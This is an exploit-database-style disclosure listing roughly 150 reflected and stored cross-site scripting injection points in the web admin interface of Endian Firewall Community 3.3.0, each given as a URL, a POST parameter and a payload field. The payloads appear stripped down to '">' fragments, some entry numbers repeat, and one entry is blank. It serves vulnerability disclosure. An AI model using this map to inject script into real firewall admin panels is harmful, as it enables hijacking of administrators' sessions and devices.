################################################################################################################################## # Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site Scripting # Date: 24.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.endian.com # Software Link: https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/ # Version: 3.3.0 ################################################################################################################################## Introduction Endian Firewall Community (EFW) is a turn-key Linux based security software product designed for home that can transform any unused hardware appliance into a full-featured Unified Threat Management (UTM) solution. Endian Community is designed to make security simple and help protect home networks by using the power of Open Source. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_ADDRESS PAYLOAD ################################################################################# XSS2 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_NETMASK PAYLOAD ################################################################################# XSS3 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_ADDITIONAL PAYLOAD ################################################################################# XSS4 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MTU PAYLOAD ################################################################################# XSS5 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAC PAYLOAD ################################################################################# XSS6 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_ADMINMAIL PAYLOAD ################################################################################# XSS7 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_MAILFROM PAYLOAD ################################################################################# XSS8 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_SMARTHOST PAYLOAD ################################################################################# XSS9 | Stored URL https://192.168.2.200:10443/manage/notifications/ METHOD Post PARAMETER SMARTHOST_ADDRESS PAYLOAD "> ################################################################################# XSS10 | Stored URL https://192.168.2.200:10443/manage/notifications/ METHOD Post PARAMETER SMARTHOST_USERNAME PAYLOAD "> ################################################################################# XSS11 | Stored URL https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2 METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS12 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_name PAYLOAD "> ################################################################################# XSS13 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_email PAYLOAD "> ################################################################################# XSS14 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_ou PAYLOAD "> ################################################################################# XSS15 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_city PAYLOAD "> ################################################################################# XSS16 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_state PAYLOAD "> ################################################################################# XSS17 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_days PAYLOAD "> ################################################################################# XSS18 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "> ################################################################################# XSS19 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_RCPTTO PAYLOAD "> ################################################################################# XSS20 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_MAILFROM PAYLOAD "> ################################################################################# XSS21 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_SMARTHOST PAYLOAD "> ################################################################################# XSS22 | Stored URL https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1 METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS23 | Reflected URL https://192.168.2.200:10443/cgi-bin/routing.cgi METHOD Post PARAMETER source PAYLOAD "> ################################################################################# XSS24 | Reflected URL https://192.168.2.200:10443/cgi-bin/routing.cgi METHOD Post PARAMETER destination PAYLOAD "> ################################################################################# XSS25 | Reflected URL METHOD PARAMETER PAYLOAD "> ################################################################################# XSS26 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER source PAYLOAD "> ################################################################################# XSS27 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER destination PAYLOAD "> ################################################################################# XSS28 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER port PAYLOAD "> ################################################################################# XSS29 | Stored URL https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi METHOD Post PARAMETER NAME PAYLOAD "> ################################################################################# XSS30 | Reflected URL https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi METHOD Post PARAMETER DEVICE PAYLOAD "> ################################################################################# XSS31 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_GREEN PAYLOAD "> ################################################################################# XSS32 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_GREEN PAYLOAD "> ################################################################################# XSS33 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_GREEN PAYLOAD "> ################################################################################# XSS34 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_ORANGE PAYLOAD "> ################################################################################# XSS35 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_ORANGE PAYLOAD "> ################################################################################# XSS36 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_ORANGE PAYLOAD "> ################################################################################# XSS37 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_BLUE PAYLOAD "> ################################################################################# XSS38 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_BLUE PAYLOAD "> ################################################################################# XSS39 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_BLUE PAYLOAD "> ################################################################################# XSS40 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS41 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER filename PAYLOAD "> ################################################################################# XSS42 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER root_path PAYLOAD "> ################################################################################# XSS43 | Reflected URL https://192.168.2.200:10443/cgi-bin/time.cgi METHOD Post PARAMETER NTP_SERVER_LIST PAYLOAD "> ################################################################################# XSS44 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS45 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER host PAYLOAD "> ################################################################################# XSS46 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER user PAYLOAD "> ################################################################################# XSS3 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER ham PAYLOAD "> ################################################################################# XSS48 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER spam PAYLOAD "> ################################################################################# XSS49 | Reflected URL https://192.168.2.200:10443/manage/qos/devices/ METHOD Post PARAMETER device PAYLOAD "> ################################################################################# XSS50 | Reflected URL https://192.168.2.200:10443/manage/qos/classes/ METHOD Post PARAMETER name PAYLOAD "> ################################################################################# XSS51 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER protocol PAYLOAD "> ################################################################################# XSS52 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER dscp PAYLOAD "> ################################################################################# XSS53 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER comment PAYLOAD "> ################################################################################# XSS54 | Reflected URL https://192.168.2.200:10443/cgi-bin/dnat.cgi METHOD Post PARAMETER target_ip_ip PAYLOAD "> ################################################################################# XSS55 | Reflected URL https://192.168.2.200:10443/cgi-bin/snat.cgi METHOD Post PARAMETER source PAYLOAD "> ################################################################################# XSS56 | Reflected URL https://192.168.2.200:10443/cgi-bin/snat.cgi METHOD Post PARAMETER snat_to_ip PAYLOAD "> ################################################################################# XSS57 | Stored URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER destination PAYLOAD "> ################################################################################# XSS58 | Reflected URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER target PAYLOAD "> ################################################################################# XSS59 | Stored URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS60 | Reflected URL https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi METHOD Post PARAMETER target PAYLOAD "> ################################################################################# XSS61 | Stored URL https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS62 | Reflected URL https://192.168.2.200:10443/cgi-bin/zonefw.cgi METHOD Post PARAMETER target PAYLOAD "> ################################################################################# XSS63 | Stored URL https://192.168.2.200:10443/cgi-bin/zonefw.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS64 | Reflected URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER source PAYLOAD "> ################################################################################# XSS65 | Reflected URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER target PAYLOAD "> ################################################################################# XSS66 | Stored URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS67 | Reflected URL https://192.168.2.200:10443/cgi-bin/xtaccess.cgi METHOD Post PARAMETER target PAYLOAD "> ################################################################################# XSS68 | Stored URL https://192.168.2.200:10443/cgi-bin/xtaccess.cgi METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS69 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER PROXY_PORT PAYLOAD "> ################################################################################# XSS70 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER VISIBLE_HOSTNAME PAYLOAD "> ################################################################################# XSS71 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER ADMIN_MAIL_ADDRESS PAYLOAD "> ################################################################################# XSS72 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER BYPASS_SOURCE PAYLOAD "> ################################################################################# XSS73 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER BYPASS_DESTINATION PAYLOAD "> ################################################################################# XSS74 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER CACHE_SIZE PAYLOAD "> ################################################################################# XSS75 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER CACHE_MEM PAYLOAD "> ################################################################################# XSS76 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER MAX_SIZE PAYLOAD "> ################################################################################# XSS77 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER DST_NOCACHE PAYLOAD "> ################################################################################# XSS78 | Stored URL https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi METHOD Post PARAMETER filtertype PAYLOAD "> ################################################################################# XSS79 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_CHILDREN PAYLOAD "> ################################################################################# XSS80 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_MAX_USERIP PAYLOAD "> ################################################################################# XSS81 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_CACHE_TTL PAYLOAD "> ################################################################################# XSS82 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_IPCACHE_TTL PAYLOAD "> ################################################################################# XSS83 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER NCSA_MIN_PASS_LEN PAYLOAD "> ################################################################################# XSS84 | Reflected URL https://192.168.2.200:10443/manage/proxy/adjoin/ METHOD Post PARAMETER ADMIN_USER PAYLOAD "> ################################################################################# XSS85 | Reflected URL https://192.168.2.200:10443/cgi-bin/frox.cgi METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD "> ################################################################################# XSS86 | Reflected URL https://192.168.2.200:10443/cgi-bin/frox.cgi METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD "> ################################################################################# XSS87 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER VIRUS_ADMIN PAYLOAD "> ################################################################################# XSS88 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER NOTIFICATION_SENDER PAYLOAD "> ################################################################################# XSS89 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER BYPASS_SOURCE PAYLOAD "> ################################################################################# XSS90 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER BYPASS_DESTINATION PAYLOAD "> ################################################################################# XSS91 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SENDER_WHITELIST PAYLOAD "> ################################################################################# XSS92 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER RECIPIENT_WHITELIST PAYLOAD "> ################################################################################# XSS93 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER CLIENT_WHITELIST PAYLOAD "> ################################################################################# XSS94 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SENDER_BLACKLIST PAYLOAD "> ################################################################################# XSS95 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER RECIPIENT_BLACKLIST PAYLOAD "> ################################################################################# XSS96 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER CLIENT_BLACKLIST PAYLOAD "> ################################################################################# XSS97 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER WHITELIST_RECIPIENT PAYLOAD "> ################################################################################# XSS98 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER WHITELIST_CLIENT PAYLOAD "> ################################################################################# XSS99 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SPAM_WHITELIST PAYLOAD "> ################################################################################# XSS100 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SPAM_BLACKLIST PAYLOAD "> ################################################################################# XSS101 | Stored URL https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi METHOD Post PARAMETER DOMAIN PAYLOAD "> ################################################################################# XSS102 | Stored URL https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi METHOD Post PARAMETER SERVER PAYLOAD "> ################################################################################# XSS103 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER domain PAYLOAD "> ################################################################################# XSS104 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER smarthost_address PAYLOAD "> ################################################################################# XSS105 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER smarthost_username PAYLOAD "> ################################################################################# XSS106 | Stored URL https://192.168.2.200:10443/cgi-bin/smtprouting.cgi METHOD Post PARAMETER ADDRESS PAYLOAD "> ################################################################################# XSS107 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtprouting.cgi METHOD Post PARAMETER BCC PAYLOAD "> ################################################################################# XSS108 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMARTHOST_USERNAME PAYLOAD "> ################################################################################# XSS109 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER AUTH_DAEMONS PAYLOAD "> ################################################################################# XSS110 | Stored URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER IMAP_AUTH_SERVER PAYLOAD ################################################################################# XSS111 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMTP_HELO_NAME PAYLOAD "> ################################################################################# XSS112 | Stored URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER ALWAYS_BCC_ADDRESS PAYLOAD "> ################################################################################# XSS113 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER MAILTEMPLATE_LANGUAGE PAYLOAD "> ################################################################################# XSS114 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMTPD_HARD_ERROR_LIMIT PAYLOAD "> ################################################################################# XSS115 | Reflected URL https://192.168.2.200:10443/manage/dnsmasq/localdomains/ METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS116 | Reflected URL https://192.168.2.200:10443/manage/openvpn/ METHOD Post PARAMETER reneg_sec PAYLOAD "> ################################################################################# XSS55 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS118 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER secret PAYLOAD "> ################################################################################# XSS119 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_name PAYLOAD "> ################################################################################# XSS120 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_email PAYLOAD "> ################################################################################# XSS121 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_ou PAYLOAD "> ################################################################################# XSS122 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_organization PAYLOAD "> ################################################################################# XSS123 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_city PAYLOAD "> ################################################################################# XSS124 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_state PAYLOAD "> ################################################################################# XSS125 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_days PAYLOAD "> ################################################################################# XSS126 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "> ################################################################################# XSS127 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER local_peerid PAYLOAD "> ################################################################################# XSS128 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER remote_peerid PAYLOAD "> ################################################################################# XSS129 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER name PAYLOAD "> ################################################################################# XSS130 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER remark PAYLOAD "> ################################################################################# XSS131 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER new_cert_days PAYLOAD "> ################################################################################# XSS132 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "> ################################################################################# XSS133 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_department PAYLOAD "> ################################################################################# XSS134 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_organization PAYLOAD "> ################################################################################# XSS135 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_city PAYLOAD "> ################################################################################# XSS136 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_state PAYLOAD "> ################################################################################# XSS137 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_name PAYLOAD "> ################################################################################# XSS138 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_ou PAYLOAD "> ################################################################################# XSS139 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_organization PAYLOAD "> ################################################################################# XSS140 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_city PAYLOAD "> ################################################################################# XSS141 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_state PAYLOAD "> ################################################################################# XSS142 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "> ################################################################################# XSS143 | Stored URL https://192.168.2.200:10443/cgi-bin/logs_log.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS144 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_log.cgi METHOD Post PARAMETER OFFSET PAYLOAD "> ################################################################################# XSS145 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_ids.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS146 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS147 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS148 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS149 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi METHOD Post PARAMETER OFFSET PAYLOAD "> ################################################################################# XSS149 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS150 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi METHOD Post PARAMETER DATE PAYLOAD "> ################################################################################# XSS151 | Stored URL https://192.168.2.200:10443/manage/opentsa/ METHOD Post PARAMETER HTTP_USERNAME PAYLOAD "> ################################################################################# XSS152 | Stored URL https://192.168.2.200:10443/manage/opentsa/ METHOD Post PARAMETER HTTP_PASSWORD PAYLOAD "> #################################################################################